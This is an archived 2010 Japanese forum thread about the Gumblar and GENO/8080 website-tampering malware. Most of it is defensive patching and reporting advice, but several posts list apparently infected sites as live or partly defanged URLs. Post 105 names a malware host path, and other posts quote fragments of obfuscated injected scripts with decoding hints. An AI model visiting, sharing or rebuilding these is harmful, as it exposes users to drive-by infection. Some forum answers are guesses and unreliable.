5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】

1 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:14:22
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】
http://pc11.2ch.net/test/read.cgi/sec/1268059684/

2 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:15:14
Gumblar(.x)、8080系ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

3 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:17:03
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

4 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:18:26
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります

●InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
  ※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす

5 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:19:19
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。

【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html

6 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:22:20
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView

設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

7 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:49:11
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。

■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/


サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。

以下、代表的なサーバー管理会社

デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support

8 :名無しさん@お腹いっぱい。:2010/04/21(水) 04:06:35
改竄を受けたら

ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先

IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html

9 :名無しさん@お腹いっぱい。:2010/04/21(水) 04:10:59
関連情報

LAC セキュリティアラート
【注意喚起】Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認
http://www.lac.co.jp/info/alert/alert20100303.html
 > 株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。

ニュース・リリース|アンチウイルス・アンチウイルスソフトの【 カスペルスキー 】
Gumblar 亜種に続く、Pegel 対策に関する留意点
http://www.kaspersky.co.jp/news?id=207578803
 > 感染が確認された場合は、対策として OS の再インストールをお勧めします。

セキュリティ通信
サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2166
サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
http://www.so-net.ne.jp/security/news/library/2112.html
「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
http://www.so-net.ne.jp/security/news/newstopics_201001.html

10 :名無しさん@お腹いっぱい。:2010/04/21(水) 10:03:02

┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─

┌─┌─小野寺です。〓MS Japan Security Team〓┌─┌─┌─┌─┌─┌─

ttp://internet.watch.impress.co.jp/img/iw/docs/324/669/mse1.jpg


国/地域ごとのマルウェア感染率。(Microsoft Security Intelligence Reportより)
日本は最も感染率が低い(緑色)が、依然として感染率が高い地域(赤色)も多い。

ttp://internet.watch.impress.co.jp/img/iw/docs/324/669/mse2.jpg


┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─

下記の図は、2009 年上半期における、8 地域での異なる種類のマルウェアと迷惑
ソフトウェアである可能のあるものの相対的な蔓延を表しています。
(それぞれの期間中に 2 種類以上の脅威が削除されるコンピューターも存在するため、
それぞれの地域における感染率の合計が 100 パーセントを超える場合があります。)
この図で使用されている項目の説明は、マイクロソフト セキュリティ インテリジェンス
レポート 第 7 版40 ページをご覧ください。
                                         いとかしこ

ttp://img.microsoft.com/japan/security/images/contents/SirV7MalType.png

┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─
┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─


11 :名無しさん@お腹いっぱい。:2010/04/21(水) 16:48:28
たまたま見つけた感染サイト。
Gumblarの方も元気ですね。
www●putto24●com

12 :名無しさん@お腹いっぱい。:2010/04/21(水) 20:28:32
結局のところWindows使わなければ問題なし?

13 :名無しさん@お腹いっぱい。:2010/04/21(水) 20:58:18
断定はできないがその可能性は高いな

14 :名無しさん@お腹いっぱい。:2010/04/22(木) 00:53:07
アドレスバーに"res://ieframe.dll/"の表示のとき、 Gumblarはあなたの個人情報を狙ってる

15 :名無しさん@お腹いっぱい。:2010/04/22(木) 05:18:04
よくわからんけどURLブロックに追加してみる俺

16 :名無しさん@お腹いっぱい。:2010/04/22(木) 08:28:17
www.terminalstudio.com/dask-castle-3d.shtml
↑のサイトavastがトロイの木馬発見してブロックしたけど、表示しただけで感染するの?

17 :名無しさん@お腹いっぱい。:2010/04/22(木) 10:32:26
>>16
>>1

スクリプトではなくトロイってことはすでに何かDLしてるんじゃね
他の何かに感染してる可能性も否めない

18 :名無しさん@お腹いっぱい。:2010/04/22(木) 10:45:39
VirusTotalにhtmlぶちこんだ
http://www.virustotal.com/jp/analisis/f7e58080cb1ab8edf742a3e98e87a90292d7ea85f4263a013c3e02b9f9997b7d-1271900484

19 :コテハン ◆8080adndqg :2010/04/22(木) 13:28:22
>>16
ソースの最後に
<script>function eIGJJlOJ(・・・・・
8080とはちょっと違うタイプのやつ

20 :名無しさん@お腹いっぱい。:2010/04/22(木) 14:36:01
>>16
tapiroten■info/lin.cgi?jzo
繋がらない

21 :名無しさん@お腹いっぱい。:2010/04/22(木) 18:14:16
>>16
Gumblar.Xの亜種とかだな多分
多分だけど

22 :名無しさん@お腹いっぱい。:2010/04/22(木) 18:17:19
functionがちょっと多いな。珍しい。

23 :コテハン ◆8080adndqg :2010/04/22(木) 19:42:12
前々スレあたりから話題になってた
ttp://8.pro.tok2.com/~miyuki-net-school/index.html

>【最低最悪のsecurity toolに関して】は削除しました。

>連日,相当 多数の皆さんが このページの駆除方法で security toolを駆除され,
>再び 元通りにパソコンを使用出来たにも関わらず
>ほとんどの皆さんから 何の喜びのメッセージをいただけませんでした。

>よって このページは削除しました。
>security toolの駆除方法を知りたい人は メールをください。


このジジイの上から目線は何とかならんのか?


24 :名無しさん@お腹いっぱい。:2010/04/22(木) 19:49:13
SecurityToolsなんざ他のサイトでも散々既出だから放っとけ

25 :名無しさん@お腹いっぱい。:2010/04/22(木) 19:49:17
>>23
やれやれ…
http://okwave.jp/qa/q5439358.html
で自サイトの宣伝までしてらぁw

ググりゃ削除方法ぐらいいくらでも出て来るのに、メール出すやつがいるのかねぇ?

26 :名無しさん@お腹いっぱい。:2010/04/22(木) 19:58:13
2チャンネルらしくなってきたな
放っておけばいいのに

27 :名無しさん@お腹いっぱい。:2010/04/22(木) 20:01:46
>>23
ググって10番目以内にいるならそのページを見て駆除したってやつもいるかもしれんが…
さすがに自意識過剰すぎてキモいな

28 :名無しさん@お腹いっぱい。:2010/04/22(木) 20:12:33
そんなの全くの自由だろ
おまえらのがキモいよ
つうか気違いだろお前

29 :名無しさん@お腹いっぱい。:2010/04/22(木) 20:15:48
長岡乙www

30 :名無しさん@お腹いっぱい。:2010/04/22(木) 20:16:48
喜びのメッセージわろた

31 :名無しさん@お腹いっぱい。:2010/04/22(木) 22:19:44
証明書のエラー 接続の傍受

32 :名無しさん@お腹いっぱい。:2010/04/23(金) 00:22:52
http://www.aguse.jp/?m=w&url=http://suznoblog.blog111.fc2.com/
ここにある8080って大丈夫ですか?
Adblock Plusで8080ブロックしてるフィルタに引っかかったのですが
aguseだとウイルスじゃないようです
外部と接続するオブジェクトが青く表示されているので気になります

33 :コテハン ◆8080adndqg :2010/04/23(金) 01:54:31
>>32
アクセス解析


34 :名無しさん@お腹いっぱい。:2010/04/23(金) 03:36:26
【陥落サイトのURL悪用厳禁】

www●idem-home●co●jp
既出だったらごめんよ


she3ah●110mb●com
<script>tmp="22111122211122112111212221…
1と2がだらだらと…こんなスクリプトあったのね

35 :名無しさん@お腹いっぱい。:2010/04/23(金) 08:01:03
>>33
thx
フィルタに初めて引っかかったので
心配だったが安心したよ

36 :名無しさん@お腹いっぱい。:2010/04/23(金) 08:13:59
71 :ぼるじょあ ◆yBEncckFOU :2010/04/19(月) 11:00:52
(・3・) エェー お前ら またガンプラーが流行ってるYO

http://www.asahi.com/shopping/news/TKY201004180319.html

72 :ぼるじょあ ◆yBEncckFOU :2010/04/19(月) 15:42:03
>>71
(・3・) 〜♪


Mac OS Xに脆弱性、Appleがセキュリティアップデート公開
http://itpro.nikkeibp.co.jp/article/NEWS/20100419/347238/

37 :コテハン ◆8080adndqg :2010/04/23(金) 13:12:04
先生のキャッシュで捕捉したが・・・新コードがきてるっぽい

【陥落サイトのURL悪用厳禁】
74●125●153●132/search?q=cache:-syKPJt7YlAJ:www●mimi-navi●net/

theultimateweb●info:

以前の.substr多発型に似てるからスルーしそうになったorz

38 :名無しさん@お腹いっぱい。:2010/04/23(金) 13:29:52
前スレ使い切ろうよ

39 :コテハン ◆8080adndqg :2010/04/23(金) 13:30:23
"unescape;var"のヒット数が激減してると思ったら
%68%74%74%70%3a%2f%2f%66 ←このタイプも微妙に変化してるし・・・
【陥落サイトのURL悪用厳禁】
win●amyou●net ←絶賛放置中

40 :名無しさん@お腹いっぱい。:2010/04/23(金) 15:24:32
どうでもいいけどpegelって既にvまであるのね
giddeon●com

>>39
質問、このスクリプトは既出?
"false;var" "function" "new Date();" "String.prototype"
http://www.virustotal.com/jp/analisis/836027ac2630610f66a8560dd4c6e432c1d5c79be2ed8d82c970a116b393a700-1272002839
http://www.virustotal.com/jp/analisis/8b780235f6741c32d37c2a2b15bbdd0665cd06ddb533c8c959e4a20013684acb-1272002118

> "unescape;var"のヒット数が激減
['unescape'];varはあちこちで見掛けるけどね

41 :名無しさん@お腹いっぱい。:2010/04/23(金) 16:31:58
2週間位前からFirefoxが下記の様な怪しいサイトに時々勝手に繋がりexeをダウンロードさせようとするんだけど、
これってGumblarなのかな?
ttp://para-site.net/up/data/26635.jpg
ttp://para-site.net/up/data/26636.jpg

セキュリティ対策として使ってるのはAvira Security SuiteとMalwarebytes'とSUPERAntiSpywareで
何度かスキャンを掛けると様々なトロイが検出され、知らずに感染してる症状が一向に改善されない
手持ちのセキュソフトじゃダメかと思いF-SecureとSymantecでオンラインスキャンも試してみました
(F-Secureでトロイが2つ、Symantecは検出0)
けど、ついさっきも上記の怪しいサイトに勝手に移動された

それとWindows Updateでエラーが出て更新出来ないんだけど、これもGumblarのせいなのだろうか?[エラー番号: 0x80072EFE]
0x80072EFEでググってWindowsFWだけ有効にとか色々試してるんだけど、エラー0x80072EFEのままUpdate出来ない状態です

誰か有効な方法を教えて下さい、OSはXP SP3でIEはIE7、デフォルトブラウザはFirefox3.6.2です

42 :名無しさん@お腹いっぱい。:2010/04/23(金) 16:36:16
クリーンインストールが手っ取り早い。

あと、スレチかと。

43 :名無しさん@お腹いっぱい。:2010/04/23(金) 17:31:10
>>41
なんでもかんでもGumblarのせいにしないでくれ
お前のはもっといろんなもんに感染してる
そのPC1年以上調子悪いだろ

スレ違いだが説明しないとケーブル抜いてくれない気がする
ブラウザが半端に古いのも気になる

OSの更新やセキュリティ対策ソフトの動きを抑止するのはウイルスの常套手段
しかしそれ以前にそのPCはいろいろ感染しすぎてどうしようもない状態
システムファイルも書き換えられているだろうしその状態から元に戻すのは困難というかおそらく無理
諦めてOS入れなおせ

ただ、今ネットに接続していること自体が迷惑なのでケーブルを抜いてくださいおねがいします
OSを入れなおす時も新しいセキュリティ対策ソフトをインストールするまではケーブルは抜いたまま
OSの更新は自動にしとけ

無料のセキュリティ対策ソフトは自分でなんとかできる人用であって
そうじゃない人はきちんと購入した方が良い

DownadupってことはUSBメモリも感染してる可能性が高い
そのPCで使用したUSBメモリを他のPCにも使用しているならそっちもやられてるかもしれん

44 :名無しさん@お腹いっぱい。:2010/04/23(金) 19:37:28
>>16
Avira
TR/Dldr.Shadraem.A.27
7.10.06.194で対応

45 :名無しさん@お腹いっぱい。:2010/04/23(金) 20:26:44
>>41
もうリカバリした方いいよそれ

46 :名無しさん@お腹いっぱい。:2010/04/23(金) 23:45:58
>>34
www●idem-home●co●jp
電凸完了

>>39
win●amyou●net
電凸完了

47 :オルティス・ジャパン:2010/04/23(金) 23:49:42
出時ロックは氏ねばいいと思う

48 :名無しさん@お腹いっぱい。:2010/04/24(土) 05:31:13
前スレ使いきってください

49 :名無しさん@お腹いっぱい。:2010/04/24(土) 15:43:39
KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462

50 :名無しさん@お腹いっぱい。:2010/04/24(土) 22:53:19
www●sakiko●jp
電凸完了

51 :コテハン ◆8080adndqg :2010/04/24(土) 23:00:12
>>40 亀レススマソ
8080発掘中に遭遇したことはあるけど、海外のやつは絶賛スルー中なのです。

【陥落サイトのURL悪用厳禁】
www●asianmotors●co●jp/ ←アクセス注意!
いつのまにかコードが整理されてて・・・
一番下の<script>function c12174138951n4bc351d711cc6〜〜
もう勘弁して...


52 :名無しさん@お腹いっぱい。:2010/04/25(日) 00:42:06
>>51
こちらの環境では1371行まででその記述が見当たらないぽ。

53 :名無しさん@お腹いっぱい。:2010/04/25(日) 01:22:58
>>46
>>50
乙です

>>51
レスありがと、こちらも不躾ですまない
asianmotorsのスクリプトは消えてるみたいね、上書きしたかな?

> function pde63eee4〜
> function jIxnUrxy(){if〜
そういえば最近やたらとこのタイプに引っ掛かる


【陥落サイトのURL悪用厳禁】
winbet●tonosama●jp :JS.Shadraem VT 02/41
nihon-support●jp :スクリプトが中途半端だけど念の為

54 :名無しさん@お腹いっぱい。:2010/04/25(日) 02:07:03
>>53
上、醤油が化けちゃってわかんね。。。orz.....
下、Last-Modified: Wed, 21 Apr 2010 01:01:15 GMT : /index.html

55 :名無しさん@お腹いっぱい。:2010/04/25(日) 02:41:44
http://www.taguchiso.com/
http://winbet.tonosama.jp
http://giddeon.com
http://www.shinsei-fukushi.net/
http://www.nittoka.com/
http://www.1a.ad-jeaayf.com/ae/
http://www.tu-han4.com/hatumo/
http://www.daini-survey.com/
http://www.borneomarathon.com/jpn/home.html
http://www.niaufuku.com/index.htm
http://kumarin.biz/
http://www.amakusaturigu.com/html/
http://www.hdta.jp/
http://giddeon.com/
http://amyou.net/
http://yamisyoku.info/

56 :名無しさん@お腹いっぱい。:2010/04/25(日) 03:58:27


http://tsushima.2ch.net/test/read.cgi/news/1272134432/

57 :コテハン ◆8080adndqg :2010/04/25(日) 04:09:00
ドメインまちがえたにゃ/(^o^)\

誤:www●asianmotors●co●jp/
正:www●asianmotors●co●in/ ←アクセス注意



58 :名無しさん@お腹いっぱい。:2010/04/25(日) 04:30:44
>>57
*CODE1*
Last-Modified: Tue, 27 Oct 2009 07:47:47 GMT : Scripts/AC_RunActiveContent.js

>>51のコードは「'+x1d+'」を抜いてHEXデコードしてURLデコード

59 :名無しさん@お腹いっぱい。:2010/04/25(日) 14:47:08
どなたか教えてください。
・メールのhtmlプレビュー画面でGumblar(.x)、8080系に感染する恐れってありますか?またそういった感染報告はありますか?

・ファイアーウォールでポート8080を閉じることにより感染予防の効果はありますか?



60 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:15:05
>>59
> メールのhtmlプレビュー画面でGumblar(.x)、8080系に感染する恐れってありますか?
可能性はある。
これに限らずテキスト表示推奨。

> またそういった感染報告はありますか?
マカフィーサイトアドバイザでのgumblar.cnは一時期こんなのが出ていた。
> Our analysis found that this site may be promoted through spammy e-mail.

> ファイアーウォールでポート8080を閉じることにより感染予防の効果はありますか?
「8080系ウイルス」だけ、
Gumblar(.x)には通用しない。

61 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:19:17
>>60ちょい訂正
「8080系ウイルス」以外には通用しない。

62 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:29:07
芸能プロのケイダッシュのサイトが軒並みやられてるらしい。
オードリーの公式サイトとか

63 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:30:57
>>60
ありがとうございます。
ポート8080閉じることで8080系ウイルスの対策になるんですね。


64 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:32:51
>>63
>>2

>>62
にゃんと…

65 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:33:24
>>63
ほんとだ確認しました・・・

66 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:35:01
>>62
確認すた。

67 :名無しさん@お腹いっぱい。:2010/04/25(日) 15:40:11
>>62
冗談だと思ったけれど・・・マジだった・・・

68 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:15:41
>>63
そんなことよりしっかり>>2を行いましょう

69 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:18:56
>>62のケイダッシュについて聞きたいんだけど
ウィルスと判断できるコードはソース最後のfunctionから始まるのでいいの?
ちょっとスレたてたいもので確認できる材料が欲しい。

70 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:21:29
>>69
それでいいけどそういうことは余計な混乱の元になるから半端に載せない方がいいよ

71 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:21:53
>>70
了解です
ありがとう

72 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:28:17
というかハッシュっぽい目印も含めて2行か
まあいいや

VirusTotal ただしこの結果だけでavastに乗り換えるというのは早計
http://www.virustotal.com/jp/analisis/d88871a1ad9e0f1df388ea0aa041fff6a4e4df09f265ef7ae624ce642b49fa9d-1272179947

73 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:34:31
>>72
スクリプトはDrWebは最近は一番だな

74 :名無しさん@お腹いっぱい。:2010/04/25(日) 16:57:34
グーグル検索結果のケイダッシュ事務所HPアドレスに
マウスポインタ合わせてただけでavastさんが怒った
どうなってんだ

75 :名無しさん@お腹いっぱい。:2010/04/25(日) 17:10:42
感染サイト踏んだんだけど感染確認方法ってありますか?
>>2は3以外しています

76 :62:2010/04/25(日) 17:12:45
ちゃんと確認したらケイダッシュのサイト(kdash●jp)の全ページ?がやられてるのね。
オードリーのは公式サイトと言うよりは公式のプロフィールページのことですな。
ちなみに各タレントの公式サイト(別ドメインでのサイト)は大丈夫っぽい。

まだまだ猛威ふるってますねぇ。
というか、いい加減にHP製作会社はウイルス対策しろ。

77 :名無しさん@お腹いっぱい。:2010/04/25(日) 17:17:22
>>74
俺はグーグルでケイダッシュを検索しただけでavastが怒りだしたわ

78 :名無しさん@お腹いっぱい。:2010/04/25(日) 17:27:30
オードリースレに確認方法を書いてきた

79 :名無しさん@お腹いっぱい。:2010/04/25(日) 17:42:34
>>75
ない

80 :名無しさん@お腹いっぱい。:2010/04/25(日) 17:49:27
>>75
本当に最新かもう一度確認をしたほうがいい

81 :名無しさん@お腹いっぱい。:2010/04/25(日) 17:53:19
>>77
俺もだ
接続を遮断したけど大丈夫なのかな?

82 :名無しさん@お腹いっぱい。:2010/04/25(日) 18:02:52
>>80
MyJVN バージョンチェッカでは最新でした

83 :62:2010/04/25(日) 18:05:01
元メジャーリーガー、現オリックスの田口の公式もやられてるらしい。
気を付けましょう。

84 :名無しさん@お腹いっぱい。:2010/04/25(日) 18:48:21
ケイダッシュは、Google safe browsingでもMS SmartScreenでもスルーだな
だれか報告しよけよ

85 :名無しさん@お腹いっぱい。:2010/04/25(日) 18:49:23
田口は、Google Safe browsingが怒り出した
けど、MS safe browsingはスルー

86 :名無しさん@お腹いっぱい。:2010/04/25(日) 19:04:19
オードリーサイトメンテ中になってる


87 :名無しさん@お腹いっぱい。:2010/04/25(日) 19:05:10
>>62
Last-Modified: Sun, 25 Apr 2010 09:18:06 GMT : /alert.html
> ただいまメンテナンス中です。
> ご迷惑をおかけしますが、もうしばらくお待ちください。

88 :名無しさん@お腹いっぱい。:2010/04/25(日) 19:06:19
>>62
一時期、スターダスト?系のHPがやられていたり
なんとかはいりって人のHPがやられてたって聞いたけど
改善はされてるのか?こわくて近づけない。

89 :名無しさん@お腹いっぱい。:2010/04/25(日) 19:17:55
>>88
後醍醐●netもやられてたお。

90 :名無しさん@お腹いっぱい。:2010/04/25(日) 19:19:03
>>89補足
今は直ってるお。

91 :名無しさん@お腹いっぱい。:2010/04/25(日) 20:01:47
>>5
亀レスですまないが

Gumblar/8080 Checker
ttp://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/

ここもいれておくべきなのでは

92 :コテハン ◆8080adndqg :2010/04/25(日) 20:07:08
>>74>>77>>81
ブラウザのリンク先読み機能を切ってください・・・なのです。

93 :名無しさん@お腹いっぱい。:2010/04/25(日) 20:07:25
>>91
それってJaneのコマンドに追加するときはどうやって書いたらいいの?

94 :名無しさん@お腹いっぱい。:2010/04/25(日) 20:27:27
>>92
サンクス
ちなみにスレチだがavastが切断を遮断したってことは感染してないよな?

95 :名無しさん@お腹いっぱい。:2010/04/25(日) 20:29:26
>>94
切断を遮断したら接続しちゃうんじゃね?

96 :名無しさん@お腹いっぱい。:2010/04/25(日) 20:34:22
>>92
ありがと
そんな機能あったんか

97 :名無しさん@お腹いっぱい。:2010/04/25(日) 20:40:41
>>95
すまん接続を遮断だった
バカか俺はw


98 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:00:25
リンク先読みはキャッシュを保存してるだけじゃなかったかな

99 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:02:38
ttp://satupa●syuriken●jp/

もしかしてかんせんしてる?

100 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:03:00
元気ブックもやられてる?

101 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:07:47
何で感染するんだよ
馬鹿じゃねえの

102 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:09:22
マジでなんで感染してるのか知りたい
使用してるセキュリティソフトとか

103 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:14:08
元気ブック改ざん受けてない?

104 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:23:11
これか
news●genki-book●jp/

avast反応した

105 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:31:24
>>104
aguseやgredで

google-analytics.com/urchin.js
floridaorigin.at:8080/google-ch/google.com/passport.net.php

出てきた

106 :名無しさん@お腹いっぱい。:2010/04/25(日) 21:52:20
元気ブック 参考程度にしかならんけど
VirusTotal
http://www.virustotal.com/jp/analisis/fe394c05411dae90e465339c9b1ff583d14f1701c564ceed167520e95b390625-1272199074

107 :名無しさん@お腹いっぱい。:2010/04/26(月) 01:00:01
オードリーの公式サイトがGENOウイルスに感染中
http://tsushima.2ch.net/test/read.cgi/news/1272180292/


avira対応してる?

